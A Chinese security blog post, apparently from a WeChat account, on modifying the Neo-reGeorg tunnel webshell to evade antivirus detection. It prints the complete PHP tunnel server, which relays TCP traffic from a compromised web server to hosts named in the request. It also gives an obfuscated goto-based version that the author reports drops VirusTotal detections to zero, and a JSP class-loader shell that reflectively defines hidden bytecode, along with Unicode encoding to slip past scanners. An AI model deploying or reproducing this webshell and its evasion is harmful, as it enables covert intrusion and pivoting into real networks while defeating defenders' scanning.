https://github.com/L-codes/Neo-reGeorg
L-codes师傅的原版隧道工具
之后Se7en师傅改写的一个免杀版Neo-reGeorg
只改了aspx的免杀
https://github.com/r00tSe7en/BypassNeo-reGeorg
因此这篇文章,我会继续完善php和jsp的免杀
Se7en师傅的aspx依旧是0查杀率,还是很猛的
我们回到原版中
通过命令生成
python neoreg.py generate -k Pig
之后将tunnel.php和tunnel.jsp上传VT看看
php的是8查杀率
// Runtime setup for the tunnel script: permit URL fopen/include, report only
// fatal and parse errors, and answer 200 where the API exists.
// NOTE(review): the suppressed notices matter for the handler below — several
// reads of undefined $info / $_SESSION keys depend on them staying hidden.
ini_set("allow_url_fopen", true);
ini_set("allow_url_include", true);
// PHP 5.x raw-POST setting; the ini key was removed in PHP 7, where this is a no-op.
ini_set('always_populate_raw_post_data', -1);
error_reporting(E_ERROR | E_PARSE);
// http_response_code() exists from PHP 5.4; '@' hides any failure of the call.
if(version_compare(PHP_VERSION,'5.4.0','>='))@http_response_code(200);
// Decodes the tunnel's tag-length-value framing into an array keyed by tag.
// Each record is a 5-byte header — signed 1-byte tag ("c1b") and big-endian
// 32-bit length ("N1l") — followed by the value bytes. The stored length is
// offset by 1166039427, which blv_encode() adds; the same constant appears
// in the JSP variant further down the page.
//
// @param string $data  raw body after base64 decoding
// @return array<int, string>  tag => value (a repeated tag overwrites)
//
// NOTE(review): no bounds checking — a truncated or malformed body is not
// guarded against; the error_reporting() level set at the top hides the
// notices unpack()/substr() would raise.
function blv_decode($data) {
$data_len = strlen($data);
$info = array();
$i = 0;
while ( $i < $data_len) {
// 5-byte header: tag (b) and offset length (l).
$d = unpack("c1b/N1l", substr($data, $i, 5));
$b = $d['b'];
$l = $d['l'] - 1166039427;
$i += 5;
$v = substr($data, $i, $l);
$i += $l;
$info[$b] = $v;
}
return $info;
}
// Inverse of blv_decode(): serialises tag => value pairs into the TLV
// framing. Two random filler entries are injected under tags 0 and 39
// (see randstr()) before encoding, so the response length and content vary
// even for identical payloads.
//
// @param array<int, string> $info  tag => value
// @return string  binary TLV stream
//
// NOTE(review): $info is passed by value, so the filler tags do not leak
// back into the caller's array.
function blv_encode($info) {
$data = "";
$info[0] = randstr();
$info[39] = randstr();
foreach($info as $b => $v) {
// Length is stored with the same fixed offset blv_decode() subtracts.
$l = strlen($v) + 1166039427;
$data .= pack("c1N1", $b, $l);
$data .= $v;
}
return $data;
}
// Returns 5–20 random bytes (each 0–255), used as padding by blv_encode().
// mt_rand() is not a cryptographic generator; it is tolerable here only
// because the output is filler, not a secret.
//
// @return string  binary string of random length
function randstr() {
$rand = '';
$length = mt_rand(5, 20);
for ($i = 0; $i < $length; $i++) {
$rand .= chr(mt_rand(0, 255));
}
return $rand;
}
// Tag numbers of the TLV fields exchanged with the client. REDIRECTURL and
// FORCEREDIRECT are declared but never read in this script.
$DATA = 1;
$CMD = 2;
$MARK = 3;
$STATUS = 4;
$ERROR = 5;
$IP = 6;
$PORT = 7;
$REDIRECTURL = 8;
$FORCEREDIRECT = 9;
// Base64 alphabet substitution: $en is the standard alphabet, $de a fixed
// permutation of it. Incoming text is mapped $de -> $en before
// base64_decode(), outgoing text $en -> $de after base64_encode(), so the
// body on the wire is not valid standard base64. The same permuted alphabet
// appears as `charslist` in the JSP variant on this page.
$en = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
$de = "puIAGCBQPyJHVTn4OFziecZ9YD5R8xgfwl3vr+jm7hbKsXoUEtqL/10k2dSN6MWa";
// Read the whole raw request body; no form fields are used.
$post_data = file_get_contents("php://input");
// Dead branch: 0 == 1 is never true, and both substr() calls would be
// identity operations anyway (strip 0 leading / 0 trailing bytes).
if (0 == 1) {
$post_data = substr($post_data, 0);
$post_data = substr($post_data, 0, -0);
}
// Undo the alphabet permutation, base64-decode, then parse the TLV records.
$info = blv_decode(base64_decode(strtr($post_data, $de, $en)));
// Response fields, encoded at the bottom of the file.
$rinfo = array();
// The client-supplied MARK selects the per-connection session slots this
// request touches; a missing tag yields null (notice hidden by the
// error_reporting() level set at the top).
$mark = $info[$MARK];
$cmd = $info[$CMD];
$run = "run".$mark;
$writebuf = "writebuf".$mark;
$readbuf = "readbuf".$mark;
switch($cmd){
// CONNECT: open an outbound TCP socket to the IP/port taken from the request
// body — any host the web server itself can reach — then stay inside this
// request for the life of the connection, pumping bytes between the socket
// and two session-stored buffers that FORWARD fills and READ drains.
case "CONNECT":
{
// No execution-time limit: this request runs until $_SESSION[$run] is
// cleared (DISCONNECT) or the socket fails.
set_time_limit(0);
$target = $info[$IP];
$port = (int) $info[$PORT];
// 3-second connect timeout; $errno/$errstr are never reported back.
$res = fsockopen($target, $port, $errno, $errstr, 3);
if ($res === false)
{
$rinfo[$STATUS] = 'FAIL';
$rinfo[$ERROR] = 'Failed connecting to target';
break;
}
stream_set_blocking($res, false);
// Keep running even after the HTTP client disconnects.
ignore_user_abort();
// The session is opened and closed around every access — presumably so the
// session lock is not held for the life of the loop and concurrent
// READ/FORWARD requests on the same session can proceed.
@session_start();
$_SESSION[$run] = true;
$_SESSION[$writebuf] = "";
$_SESSION[$readbuf] = "";
session_write_close();
// $_SESSION stays readable after session_write_close(); the flag seen here is
// whatever the most recent session_start() inside the loop loaded.
while ($_SESSION[$run])
{
// Back off 50 ms when nothing is pending (tested on the previously loaded
// copy, before the fresh session_start() below).
if (empty($_SESSION[$writebuf])) {
usleep(50000);
}
$readBuff = "";
// Take everything FORWARD has queued for the socket and clear the slot.
@session_start();
$writeBuff = $_SESSION[$writebuf];
$_SESSION[$writebuf] = "";
session_write_close();
if ($writeBuff != "")
{
stream_set_blocking($res, false);
$i = fwrite($res, $writeBuff);
// NOTE(review): a short write (fewer bytes than strlen($writeBuff)) is not
// detected; only an outright false return ends the tunnel.
if($i === false)
{
@session_start();
$_SESSION[$run] = false;
session_write_close();
// return at file scope ends the script; the echo at the bottom is skipped.
return;
}
}
stream_set_blocking($res, false);
// Drain the socket in chunks of up to 512 bytes. The loop condition is a
// truthiness test, so it also stops on a chunk that is exactly "0".
while ($o = fgets($res, 513)) {
// Unreachable: the loop condition above already excludes false.
if($o === false)
{
@session_start();
$_SESSION[$run] = false;
session_write_close();
return;
}
$readBuff .= $o;
// Cap one pass at 512 KiB so the session write below stays bounded.
if ( strlen($readBuff) > 524288 ) {
break;
}
}
// Append what was read to the slot that READ drains.
if ($readBuff != ""){
@session_start();
$_SESSION[$readbuf] .= $readBuff;
session_write_close();
}
}
fclose($res);
}
// Remove any Set-Cookie header session_start() queued, so the long-running
// CONNECT response carries no session cookie.
@header_remove('set-cookie');
break;
// DISCONNECT: clear the three session slots; the CONNECT loop sees
// $_SESSION[$run] missing (falsy) after its next session_start().
case "DISCONNECT":
{
@session_start();
unset($_SESSION[$run]);
unset($_SESSION[$readbuf]);
unset($_SESSION[$writebuf]);
session_write_close();
}
break;
// READ: return whatever the socket produced since the last READ.
case "READ":
{
@session_start();
$readBuffer = $_SESSION[$readbuf];
$_SESSION[$readbuf]="";
$running = $_SESSION[$run];
session_write_close();
if ($running) {
$rinfo[$STATUS] = 'OK';
$rinfo[$DATA] = $readBuffer;
header("Connection: Keep-Alive");
} else {
$rinfo[$STATUS] = 'FAIL';
$rinfo[$ERROR] = 'TCP session is closed';
}
}
break;
// FORWARD: queue the client's bytes (tag DATA) for the CONNECT loop to write.
case "FORWARD": {
@session_start();
$running = $_SESSION[$run];
session_write_close();
if(!$running){
$rinfo[$STATUS] = 'FAIL';
$rinfo[$ERROR] = 'TCP session is closed';
break;
}
$rawPostData = $info[$DATA];
// Truthiness test: a payload of exactly "0" is treated as missing.
if ($rawPostData) {
@session_start();
$_SESSION[$writebuf] .= $rawPostData;
session_write_close();
$rinfo[$STATUS] = 'OK';
header("Connection: Keep-Alive");
} else {
$rinfo[$STATUS] = 'FAIL';
$rinfo[$ERROR] = 'POST data parse error';
}
}
break;
// Any other command (including a body that does not decode): answer with
// the fixed banner below.
default: {
$sayhello = true;
@session_start();
session_write_close();
}
}
// $sayhello is only assigned in the default branch; for every other command
// this reads an undefined variable (null, notice suppressed) and takes else.
if ( $sayhello ) {
// Fixed banner, stored through the same alphabet permutation.
echo base64_decode(strtr("4IGXHzuI5AxQZ9xonc+3Vi82FGC2VcxCRAD0RLcQVvTceBDBgmhDFvuccQy4DQh+YiPkRAYtFCcSz3M28mwqTcTuZjOEDZ8wHz/W", $de, $en));
} else {
// Encode the TLV response and apply the permutation on the way out.
echo strtr(base64_encode(blv_encode($rinfo)), $en, $de);
}
这里我采用php混淆达到免杀
网址为:https://uutool.cn/php/
//Obfuscate by https://uutool.cn/php/
goto DiyoF; qkh1s: $yJiKn = array(); goto c2eVs; V7BSa: qiELO: goto X6ps9; iht0r: NOKcS: goto Dzpx_; fxVqu: if (!(0 == 1)) { goto qsnHO; } goto G7bcV; iyFdO: if ($kgxNf) { goto p348t; } goto j9ldZ; G7bcV: $UDwac = substr($UDwac, 0); goto aJ7VY; anrTn: $pgi43 = "162145141144x62165146" . $le84h; goto WRIfA; X6ps9: LUbTO: goto iyFdO; HjKYv: ini_set("141154x77x61171163x5f160x6fx70x75x6c141x74145x5f162141x77137x70x6f163x74137x64x61164x61", -1); goto ov4mg; mAQvw: $Fdwgu = "160165x49x41x47x43102x51120171112110x56x54x6e64x4f106x7ax69145x63132x3913110465x5270x78x67146167x6c63x7616253x6a15567150142x4bx73130157125105x74161114x2fx31x30x6bx32144x53116x36115x57141"; goto Os3y8; Q9D0I: p348t: goto uoR94; Otptt: function OGR75() { goto MWv6s; uSl_y: $b_8NZ .= chr(mt_rand(0, 255)); goto kbqxM; C1QS1: $L9j4H = mt_rand(5, 20); goto kAlkc; s41b8: pw39c: goto FivlI; FivlI: if (!($eHFvf < $L9j4H)) { goto agdWc; } goto uSl_y; nRKX0: return $b_8NZ; goto FWD42; Blldx: goto pw39c; goto kD8IJ; GksHO: $eHFvf++; goto Blldx; kbqxM: Py1IM: goto GksHO; kAlkc: $eHFvf = 0; goto s41b8; MWv6s: $b_8NZ = ''; goto C1QS1; kD8IJ: agdWc: goto nRKX0; FWD42: } goto MBDTV; LXXRF: $qv16o = 2; goto eEM3n; qw9Qz: $KBl8D = 5; goto E3GYS; DiyoF: ini_set("x61x6cx6c157167x5fx75162x6c137146x6f160x65x6e", true); goto RhTpZ; MBDTV: $kmN5U = 1; goto LXXRF; RhTpZ: ini_set("x61x6c154x6f167137x75162x6c137151x6e143154x75144145", true); goto HjKYv; k2alC: @http_response_code(200); goto iht0r; aJ7VY: $UDwac = substr($UDwac, 0, -0); goto hn1Y1; OE5nK: $bfqIR = 7; goto JNdFi; Dzpx_: function YkFKn($K2yeg) { goto J56qo; b9kH3: goto bdxpT; goto VsuAt; kwzCT: return $vRoxA; goto oo3WG; oBHaV: $eHFvf = 0; goto rvVoQ; VsuAt: vPOFN: goto kwzCT; J56qo: $p4kcO = strlen($K2yeg); goto w1nIi; lppuD: $eHFvf += $GGWi9; goto HtPYQ; XyOCY: $GGWi9 = $zunF2["154"] - 1166039427; goto X9Pjy; rvVoQ: bdxpT: goto FOmCj; FOmCj: if (!($eHFvf < $p4kcO)) { goto vPOFN; } goto Uiled; X9Pjy: $eHFvf += 5; goto Wm_Zg; HtPYQ: $vRoxA[$cFikd] = $xV7UN; goto 
b9kH3; Wm_Zg: $xV7UN = substr($K2yeg, $eHFvf, $GGWi9); goto lppuD; Uiled: $zunF2 = unpack("x63x31142x2f116x31x6c", substr($K2yeg, $eHFvf, 5)); goto XDVp8; XDVp8: $cFikd = $zunF2["142"]; goto XyOCY; w1nIi: $vRoxA = array(); goto oBHaV; oo3WG: } goto DG_QK; ov4mg: error_reporting(E_ERROR | E_PARSE); goto z3TwM; ar2to: $FDnsT = "x41102103x44105x46107110111112113114115116117x50x51x52x53x54125126x57130x59132x61x62143144145x66x67150151152153x6c155156157x70161x72x73164x75166167170x79x7ax30x3162x33x34x3566x37x38x3953x2f"; goto mAQvw; eL4Vs: goto O1FHC; goto Q9D0I; eEM3n: $wG38l = 3; goto ystKv; DG_QK: function nHcmy($vRoxA) { goto siiD9; wlfOi: $vRoxA[39] = oGR75(); goto KAekY; RZXtK: return $K2yeg; goto L7DLT; N3ATX: $vRoxA[0] = OgR75(); goto wlfOi; vpz3E: BzP21: goto RZXtK; KAekY: foreach ($vRoxA as $cFikd => $xV7UN) { goto jzIeX; BXXkg: $K2yeg .= pack("14361x4e61", $cFikd, $GGWi9); goto ldnbr; kgAur: KKAEH: goto StzWf; ldnbr: $K2yeg .= $xV7UN; goto kgAur; jzIeX: $GGWi9 = strlen($xV7UN) + 1166039427; goto BXXkg; StzWf: } goto vpz3E; siiD9: $K2yeg = ''; goto N3ATX; L7DLT: } goto Otptt; JNdFi: $LWf6B = 8; goto z9mSH; y5Mgt: $uIwpy = "167162x69164x65x62x75x66" . $le84h; goto anrTn; LKfMs: $UGmnG = "x72165156" . 
$le84h; goto y5Mgt; uoR94: echo base64_decode(strtr("x34x49x47130110x7a165x49x35101x78121x5a71170157156x63x2bx33126151x38x32106x47x4362126x63170103x52101x4460122114143x51x56x76124x63145x42x44102147155x68104106x76x75x63143121x7964104121x68x2bx59x69x50x6b122101131164x46x43x63x53172x33x4dx32x38x6dx77161124143x54165132x6a117105104132x38167110x7a57x57", $Fdwgu, $FDnsT)); goto ynfgy; c2eVs: $le84h = $vRoxA[$wG38l]; goto f9zL9; UkJrZ: $vRoxA = Ykfkn(base64_decode(strtr($UDwac, $Fdwgu, $FDnsT))); goto qkh1s; WRIfA: switch ($nmTgZ) { case "x43117x4ex4ex45x43x54": goto wDJIo; pHFVG: cK0X4: goto F0l9p; Y5yDt: @session_start(); goto UdQCO; Axxtp: $_SESSION[$uIwpy] = ''; goto eb49j; eb49j: $_SESSION[$pgi43] = ''; goto ESlro; BW16x: stream_set_blocking($B8OFT, false); goto uBpnK; bBh1T: $_SESSION[$uIwpy] = ''; goto y27SM; RXKxW: session_write_close(); goto oxklA; dIvVN: return; goto MLNR8; WsezN: if (!(strlen($MVF3v) > 524288)) { goto lZU0u; } goto FeuSH; asVZg: if (!$_SESSION[$UGmnG]) { goto HzoMW; } goto tY8R4; Y9VQG: lZU0u: goto mblUv; HEGaw: HA7EC: goto miGP9; uWv8z: @session_start(); goto wk0g7; mblUv: goto VRhv7; goto GV_MR; hTlRx: @session_start(); goto PGHJj; vYfUE: if (!($MVF3v != '')) { goto HA7EC; } goto Y5yDt; Ajj6v: if (!($Fc2s7 === false)) { goto htBK1; } goto hTlRx; miGP9: goto OkL9w; goto wfPvC; R_LSl: $_SESSION[$UGmnG] = false; goto RXKxW; uBpnK: ignore_user_abort(); goto XA31G; L5IQM: VRhv7: goto NTRyY; y27SM: session_write_close(); goto u_Dxt; VVV5d: usleep(50000); goto HirsH; wDJIo: set_time_limit(0); goto Nd2F_; oxklA: return; goto pHFVG; ESlro: session_write_close(); goto WIy9g; nN4Yj: $_SESSION[$UGmnG] = true; goto Axxtp; BwPRn: $eHFvf = fwrite($B8OFT, $YM3Op); goto OEAmb; tyTFK: $yJiKn[$uUATI] = "x46101x49x4c"; goto KIF3r; u_Dxt: if (!($YM3Op != '')) { goto Drp44; } goto mwD54; HirsH: Uxw2C: goto dhegN; nzgsI: session_write_close(); goto dIvVN; XA31G: @session_start(); goto nN4Yj; F0l9p: Drp44: goto P0J64; PGHJj: $_SESSION[$UGmnG] = false; goto nzgsI; 
KIF3r: $yJiKn[$KBl8D] = "106141151x6cx65x6440143x6f156156145143x74151156x67x20x74157x20164141x72147x65164"; goto v6su1; P0J64: stream_set_blocking($B8OFT, false); goto L5IQM; tl_Yc: fclose($B8OFT); goto lNdbp; dhegN: $MVF3v = ''; goto uWv8z; FeuSH: goto D_0pc; goto Y9VQG; GV_MR: D_0pc: goto vYfUE; Zlv9z: goto LUbTO; goto WDfVs; eTyPT: @session_start(); goto R_LSl; tNulH: gBeXB: goto BW16x; NTRyY: if (!($Fc2s7 = fgets($B8OFT, 513))) { goto D_0pc; } goto Ajj6v; MLNR8: htBK1: goto yNMbd; xoeLD: $T3Ttz = (int) $vRoxA[$bfqIR]; goto sciZo; v6su1: goto LUbTO; goto tNulH; UdQCO: $_SESSION[$pgi43] .= $MVF3v; goto uIHgZ; sciZo: $B8OFT = fsockopen($IZI9I, $T3Ttz, $hywsM, $REcOR, 3); goto NlUoE; wfPvC: HzoMW: goto tl_Yc; tY8R4: if (!empty($_SESSION[$uIwpy])) { goto Uxw2C; } goto VVV5d; Nd2F_: $IZI9I = $vRoxA[$ZYIdm]; goto xoeLD; lNdbp: @header_remove("x73x65x7455x63157x6f153x69x65"); goto Zlv9z; mwD54: stream_set_blocking($B8OFT, false); goto BwPRn; NlUoE: if (!($B8OFT === false)) { goto gBeXB; } goto tyTFK; WIy9g: OkL9w: goto asVZg; uIHgZ: session_write_close(); goto HEGaw; yNMbd: $MVF3v .= $Fc2s7; goto WsezN; OEAmb: if (!($eHFvf === false)) { goto cK0X4; } goto eTyPT; wk0g7: $YM3Op = $_SESSION[$uIwpy]; goto bBh1T; WDfVs: case "x44111123103x4f116116x45103x54": goto fxIBW; kaJhO: unset($_SESSION[$uIwpy]); goto OcrQR; uPp6U: goto LUbTO; goto jqdkX; OcrQR: session_write_close(); goto uPp6U; gGij3: unset($_SESSION[$UGmnG]); goto mPPq3; mPPq3: unset($_SESSION[$pgi43]); goto kaJhO; fxIBW: @session_start(); goto gGij3; jqdkX: case "122x45101104": goto VCR_2; yhm95: xdxv2: goto ldlX7; CFAc3: if ($e28fe) { goto gsqey; } goto UhMGi; SrpIM: $yJiKn[$KBl8D] = "12410312040x73145x73x73151157x6e4015116340143x6cx6fx73145x64"; goto LR3ia; DGo6y: gsqey: goto Qcauz; Qcauz: $yJiKn[$uUATI] = "117x4b"; goto fVwtM; UhMGi: $yJiKn[$uUATI] = "x46x41111x4c"; goto SrpIM; iu1jN: $_SESSION[$pgi43] = ''; goto vUqS3; VCR_2: @session_start(); goto h0tNG; nqHeE: session_write_close(); goto CFAc3; GCQWB: 
header("x43157156x6e145143164151x6fx6e72x20x4b145x65160x2dx41x6c151x76145"); goto yhm95; LR3ia: goto xdxv2; goto DGo6y; fVwtM: $yJiKn[$kmN5U] = $pb70k; goto GCQWB; h0tNG: $pb70k = $_SESSION[$pgi43]; goto iu1jN; vUqS3: $e28fe = $_SESSION[$UGmnG]; goto nqHeE; ldlX7: goto LUbTO; goto sIXPy; sIXPy: case "106117x52127x41x52104": goto qMaUE; wN33E: goto ZTF42; goto dOIFX; yF59G: @session_start(); goto M3VEA; BA8GR: $yJiKn[$uUATI] = "106x41111114"; goto CcVtt; xb8TN: header("103157156156145143164151x6fx6ex3ax20113145x65160x2dx41154151166145"); goto EKtxG; g00Tk: $azrOI = $vRoxA[$kmN5U]; goto YiNK_; M3VEA: $_SESSION[$uIwpy] .= $azrOI; goto K0X1m; CcVtt: $yJiKn[$KBl8D] = "120117x53x5440144x61x7414140x70141162163x6540145x72x72157162"; goto wN33E; dOIFX: D_vyP: goto yF59G; aKG_q: KyAsp: goto g00Tk; EKtxG: ZTF42: goto VKg0l; EoWDz: $e28fe = $_SESSION[$UGmnG]; goto YABUJ; YiNK_: if ($azrOI) { goto D_vyP; } goto BA8GR; VKg0l: goto LUbTO; goto A0wmJ; eQsdn: if ($e28fe) { goto KyAsp; } goto cdEAy; esiw4: $yJiKn[$KBl8D] = "x54103x5040163145163x73151x6f1564015116340x63154x6fx73145144"; goto si62p; cdEAy: $yJiKn[$uUATI] = "x46x41111114"; goto esiw4; K0X1m: session_write_close(); goto X1sIQ; qMaUE: @session_start(); goto EoWDz; YABUJ: session_write_close(); goto eQsdn; X1sIQ: $yJiKn[$uUATI] = "x4fx4b"; goto xb8TN; si62p: goto LUbTO; goto aKG_q; A0wmJ: default: goto yCKjb; yCKjb: $kgxNf = true; goto tADqD; O4nld: session_write_close(); goto Hta0P; tADqD: @session_start(); goto O4nld; Hta0P: } goto V7BSa; z3TwM: if (!version_compare(PHP_VERSION, "x35x2ex34x2ex30", "76x3d")) { goto NOKcS; } goto k2alC; Os3y8: $UDwac = file_get_contents("x70150x707257x2f151156x70x75x74"); goto fxVqu; hn1Y1: qsnHO: goto UkJrZ; f9zL9: $nmTgZ = $vRoxA[$qv16o]; goto LKfMs; E3GYS: $ZYIdm = 6; goto OE5nK; ystKv: $uUATI = 4; goto qw9Qz; z9mSH: $VUADc = 9; goto ar2to; j9ldZ: echo strtr(base64_encode(nhcmy($yJiKn)), $FDnsT, $Fdwgu); goto eL4Vs; ynfgy: O1FHC:
将混淆好的代码重新上传VT
成功0查杀率
再到jsp
VT为17的查杀率
通过分析该jsp
<%"UTF-8"%> pageEncoding=
<%!
public static java.util.Map<String,Object> namespace = new java.util.HashMap<String,Object>();
// Gunzips a byte array in memory; used on the embedded, gzip-packed class
// bytes in the scriptlet. Reads in 256-byte chunks until read() returns -1.
//
// NOTE(review): neither stream is closed. For these in-memory streams that
// only delays buffer release, but try-with-resources would be the usual form.
public static byte[] unGzip(byte[] bytes) throws Exception{
java.io.ByteArrayOutputStream out = new java.io.ByteArrayOutputStream();
java.io.ByteArrayInputStream in = new java.io.ByteArrayInputStream(bytes);
java.util.zip.GZIPInputStream ungzip = new java.util.zip.GZIPInputStream(in);
byte[] buffer = new byte[256];
int n;
while ((n = ungzip.read(buffer)) >= 0)
out.write(buffer, 0, n);
return out.toByteArray();
}
// Defines a class directly from raw bytecode, never touching the file system.
// The method name "defineClass" is rebuilt from the ASCII byte array
// {100,101,102,105,110,101,67,108,97,115,115} so the literal does not appear
// in the page source; setAccessible(true) bypasses the protected visibility
// of ClassLoader#defineClass(byte[], int, int). The URLClassLoader has no
// URLs and only supplies the thread's context class loader as parent.
// From a detection standpoint, reflective access to defineClass from
// JSP-compiled code is the distinctive element here.
public static Class loader(byte[] bytes) throws Exception {
java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader());
java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(new String(new byte[]{100,101,102,105,110,101,67,108,97,115,115}), new Class[]{byte[].class, int.class, int.class});
method.setAccessible(true);
Class clazz = (Class) method.invoke(classLoader, new Object[]{bytes, new Integer(0), new Integer(bytes.length)});
return clazz;
}
%>
<%
// Request-scoped entry point. charslist doubles as the cache key and as the
// permuted base64 alphabet shared with the PHP variant ($de on this page).
String charslist = "puIAGCBQPyJHVTn4OFziecZ9YD5R8xgfwl3vr+jm7hbKsXoUEtqL/10k2dSN6MWa";
// Positional argument bundle handed to the loaded class (indices commented
// inline). args[3] appears to be a 128-entry ASCII-indexed reverse lookup
// for charslist (-1 = character outside the alphabet; e.g. 'p' -> 0, 'A' -> 3).
// 200 / 513 / 524288 / 1166039427 match the HTTP status, fgets() size, read
// cap and TLV length offset used by the PHP tunnel; slots 9–11 are zero —
// their meaning is not visible on this page.
Object[] args = new Object[]{
request, //0
response, //1
charslist.toCharArray(), //2
new byte[]{-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,37,-1,-1,-1,52,54,53,56,34,15,26,60,40,28,23,-1,-1,-1,-1,-1,-1,-1,3,6,5,25,48,17,4,11,2,10,43,51,61,59,16,8,7,27,58,13,47,12,62,45,24,22,-1,-1,-1,-1,-1,-1,63,42,21,57,20,31,30,41,19,38,55,33,39,14,46,0,50,36,44,49,1,35,32,29,9,18,-1,-1,-1,-1,-1},//3
new Integer(200),//4
new Integer(513),//5
new Integer(524288),//6
"4IGXHzuI5AxQZ9xonc+3Vi82FGC2VcxCRAD0RLcQVvTceBDBgmhDFvuccQy4DQh+YiPkRAYtFCcSz3M28mwqTcTuZjOEDZ8wHz/W",//7
new Integer(1166039427),//8
new Integer(0),//9
new Integer(0),//10
new Integer(0),//11
};
// First request only: gunzip the embedded class bytes, define the class and
// cache one instance. "字节码部分" is the author's placeholder for the
// bytecode, not valid Java.
if(namespace.get(charslist) == null){
byte[] clazzBytes = unGzip(new byte[]{字节码部分});
Class clazz = loader(clazzBytes);
namespace.put(charslist, clazz.newInstance());
}
// Dispatch: the cached object's equals() receives the whole args array.
// NOTE(review): presumably the loaded class overrides equals() to act as the
// handler — cannot be confirmed, since its bytecode is not on the page.
namespace.get(charslist).equals(args);
%>
因此,VT的主要查杀位置是在加载器的部分
unGzip方法用于解压缩字节数组。它使用GZIPInputStream类来读取被压缩的数据,并将解压后的数据写入ByteArrayOutputStream中,最终返回解压后的字节数组。
loader方法通过自定义的类加载器(URLClassLoader)加载一个字节数组表示的类。它使用反射调用ClassLoader类中的私有方法,将字节数组转换为Class对象并返回。
ClassLoader加载器处的查杀位置
我们可以对这部分进行unicode编码,也可以使用在线编码网址:
https://3gmfw.cn/tools/unicodebianmazhuanhuanqi/
public static java.util.Map<String,Object> namespace = new java.util.HashMap<String,Object>();
// Gunzips a byte array in memory; used on the embedded, gzip-packed class
// bytes in the scriptlet. Reads in 256-byte chunks until read() returns -1.
//
// NOTE(review): neither stream is closed. For these in-memory streams that
// only delays buffer release, but try-with-resources would be the usual form.
public static byte[] unGzip(byte[] bytes) throws Exception{
java.io.ByteArrayOutputStream out = new java.io.ByteArrayOutputStream();
java.io.ByteArrayInputStream in = new java.io.ByteArrayInputStream(bytes);
java.util.zip.GZIPInputStream ungzip = new java.util.zip.GZIPInputStream(in);
byte[] buffer = new byte[256];
int n;
while ((n = ungzip.read(buffer)) >= 0)
out.write(buffer, 0, n);
return out.toByteArray();
}
// Defines a class directly from raw bytecode, never touching the file system.
// The method name "defineClass" is rebuilt from the ASCII byte array
// {100,101,102,105,110,101,67,108,97,115,115} so the literal does not appear
// in the page source; setAccessible(true) bypasses the protected visibility
// of ClassLoader#defineClass(byte[], int, int). The URLClassLoader has no
// URLs and only supplies the thread's context class loader as parent.
// This reflective defineClass call is the part the article identifies as
// what the scanners key on.
public static Class loader(byte[] bytes) throws Exception {
java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader());
java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(new String(new byte[]{100,101,102,105,110,101,67,108,97,115,115}), new Class[]{byte[].class, int.class, int.class});
method.setAccessible(true);
Class clazz = (Class) method.invoke(classLoader, new Object[]{bytes, new Integer(0), new Integer(bytes.length)});
return clazz;
}
最终变为:
<%"UTF-8"%> pageEncoding=
<%
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
%>
<%
// Request-scoped entry point, unchanged from the original listing above.
// charslist doubles as the cache key and as the permuted base64 alphabet
// shared with the PHP variant ($de on this page).
String charslist = "puIAGCBQPyJHVTn4OFziecZ9YD5R8xgfwl3vr+jm7hbKsXoUEtqL/10k2dSN6MWa";
// Positional argument bundle handed to the loaded class (indices commented
// inline). args[3] appears to be a 128-entry ASCII-indexed reverse lookup
// for charslist (-1 = character outside the alphabet; e.g. 'p' -> 0, 'A' -> 3).
// 200 / 513 / 524288 / 1166039427 match the HTTP status, fgets() size, read
// cap and TLV length offset used by the PHP tunnel; slots 9–11 are zero —
// their meaning is not visible on this page.
Object[] args = new Object[]{
request, //0
response, //1
charslist.toCharArray(), //2
new byte[]{-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,37,-1,-1,-1,52,54,53,56,34,15,26,60,40,28,23,-1,-1,-1,-1,-1,-1,-1,3,6,5,25,48,17,4,11,2,10,43,51,61,59,16,8,7,27,58,13,47,12,62,45,24,22,-1,-1,-1,-1,-1,-1,63,42,21,57,20,31,30,41,19,38,55,33,39,14,46,0,50,36,44,49,1,35,32,29,9,18,-1,-1,-1,-1,-1},//3
new Integer(200),//4
new Integer(513),//5
new Integer(524288),//6
"4IGXHzuI5AxQZ9xonc+3Vi82FGC2VcxCRAD0RLcQVvTceBDBgmhDFvuccQy4DQh+YiPkRAYtFCcSz3M28mwqTcTuZjOEDZ8wHz/W",//7
new Integer(1166039427),//8
new Integer(0),//9
new Integer(0),//10
new Integer(0),//11
};
// First request only: gunzip the embedded class bytes, define the class and
// cache one instance. "字节码部分" is the author's placeholder for the
// bytecode, not valid Java.
if(namespace.get(charslist) == null){
byte[] clazzBytes = unGzip(new byte[]{字节码部分});
Class clazz = loader(clazzBytes);
namespace.put(charslist, clazz.newInstance());
}
// Dispatch: the cached object's equals() receives the whole args array.
// NOTE(review): presumably the loaded class overrides equals() to act as the
// handler — cannot be confirmed, since its bytecode is not on the page.
namespace.get(charslist).equals(args);
%>
上传VT看看
0查杀率完成
ashx和jspx基本都是一致的代码内容,所以不再重复改了
至于工具本身的流量检测规避,在原版中已经做了的,所以这里只改免杀层面上
原文始发于微信公众号(PwnPigPig):免杀Neo-reGeorg隧道工具-0查杀率修改完成